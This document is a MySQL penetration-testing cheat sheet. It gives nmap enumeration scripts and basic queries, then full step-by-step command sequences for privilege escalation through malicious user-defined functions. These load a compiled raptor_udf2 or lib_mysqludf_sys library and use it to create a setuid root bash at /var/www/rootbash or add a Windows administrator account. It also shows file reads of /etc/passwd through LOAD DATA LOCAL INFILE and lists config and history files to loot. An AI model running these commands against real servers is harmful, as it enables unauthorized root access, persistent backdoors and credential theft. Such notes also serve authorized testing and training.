Local Access
mysql -u root (connect as root without a password)
mysql -u <user> -p (prompt for the password)
Remote access
mysql -h <host> -u root (connect as root without a password)
mysql -h <host> -u root@localhost
nmap scripts
nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 <target>
(mysql-databases, mysql-dump-hashes, mysql-query, mysql-users and mysql-variables need a valid login: add --script-args mysqluser=<user>,mysqlpass=<pass>; mysql-audit takes its own mysql-audit.username, mysql-audit.password and mysql-audit.filename arguments. Without credentials only mysql-info, mysql-enum, mysql-empty-password and the CVE check return anything useful.)
Mysql commands
show databases;
use <database>;
show tables;
describe <table>;
SELECT <column>, <column> FROM <table>; (use * to select all columns)
SELECT * FROM <table>;
Mysql privilege escalation to root via user defined functions
Compile a shared object that defines a user defined function (UDF) wrapping system(), load it into mysqld, and run shell commands through it. The commands run as whatever user mysqld runs as, so this is a root escalation only when mysqld itself runs as root (check with ps -o user= -C mysqld). It also needs the FILE privilege on the MySQL account and secure_file_priv empty (show variables like 'secure_file_priv';), otherwise load_file() and INTO DUMPFILE are restricted or disabled.
Use exploit 1518.c (raptor_udf2 from exploit-db), transfer it to the victim and save it as raptor_udf2.c so that the compile commands below match.
Check which directory the mysqld process can read from: if load_file() on a file in /tmp returns NULL, stage the file somewhere the server process can reach (mysqld may see a private /tmp under systemd or be confined by AppArmor), e.g. /var/www or /var/www/html/.
Compile on the victim so the object matches its libc and architecture (an object built on the attacker machine usually fails to load):
gcc -g -c -fPIC raptor_udf2.c
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
Now log in to mysql as root and run the following queries (the plugin path below is the Debian/Ubuntu default; confirm it with show variables like 'plugin_dir'; since INTO DUMPFILE must write into that directory):
> show databases;
> use mysql;
> create table foo(line blob);
> insert into foo values(load_file('/var/www/raptor_udf2.so'));
> select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so';
> create function do_system returns integer soname 'raptor_udf2.so';
> select * from mysql.func; # to check if function has been loaded.
> select do_system('cp /bin/bash /var/www/rootbash; chmod +xs /var/www/rootbash');
This copies the bash binary to /var/www/rootbash and sets it setuid, owned by the user mysqld runs as (root if the precondition above holds). Run it as /var/www/rootbash -p: without -p, bash drops the effective UID back to the real one and you get an unprivileged shell.
Mysql arbitrary file read
With LOAD DATA LOCAL INFILE the MySQL or MariaDB server does not open the file itself: it asks the client to read the file and send the contents over the connection. So if you can make a MySQL client connect to a server you control, that server can request any file the client process can read. Two caveats: recent MySQL clients only answer such requests when started with local_infile enabled (mysql --local-infile=1), and patched clients refuse a file request for a statement they did not issue themselves.
This is the behaviour with the LOCAL keyword:
load data local infile "/etc/passwd" into table test FIELDS TERMINATED BY '\n';
Without LOCAL the server reads the file itself, and a server with secure_file_priv set refuses:
mysql> load data infile "/etc/passwd" into table test FIELDS TERMINATED BY '\n';
ERROR 1290 (HY000): The MySQL server is running with the --secure-file-priv option so it cannot execute this statement
Mysql privilege escalation to root via library
sqlmap ships compiled versions of these libraries (Linux .so and Windows .dll, 32 and 64 bit) under its data/udf/mysql/ directory. They are stored "cloaked", with a trailing underscore in the file name, so find them with locate lib_mysqludf_sys.so or locate lib_mysqludf_sys.dll and decode a copy with sqlmap's extra/cloak/cloak.py -d -i <file> before transferring it.
If locate is unavailable, find / -name 'lib_mysqludf_sys*' 2>/dev/null searches the host instead (whereis only looks in binary, source and man directories).
Linux:
use mysql;
create table npn(line blob);
insert into npn values(load_file('/tmp/lib_mysqludf_sys.so'));
select * from npn into dumpfile '/usr/lib/mysql/plugin/lib_mysqludf_sys.so';
create function sys_exec returns integer soname 'lib_mysqludf_sys.so';
select sys_exec('id > /tmp/out.txt');
Windows (old MySQL versions loaded UDF libraries from anywhere on the system path, hence system32; current versions only load from plugin_dir, so check show variables like 'plugin_dir'; and write the DLL there):
USE mysql;
CREATE TABLE npn(line blob);
INSERT INTO npn values(load_file('C://temp//lib_mysqludf_sys.dll'));
SELECT * FROM mysql.npn INTO DUMPFILE 'c://windows//system32//lib_mysqludf_sys_32.dll';
CREATE FUNCTION sys_exec RETURNS integer SONAME 'lib_mysqludf_sys_32.dll';
SELECT sys_exec("net user npn npn12345678 /add");
SELECT sys_exec("net localgroup Administrators npn /add");
Useful mysql files
windows
- config.ini
- my.ini
- windows\my.ini
- winnt\my.ini
- /mysql/data/
unix
- my.cnf
- /etc/my.cnf
- /etc/mysql/my.cnf
- /var/lib/mysql/my.cnf
- ~/.my.cnf
Command history
- ~/.mysql_history
Log files
- connections.log
- update.log
- common.log
For more info, check hacktricks.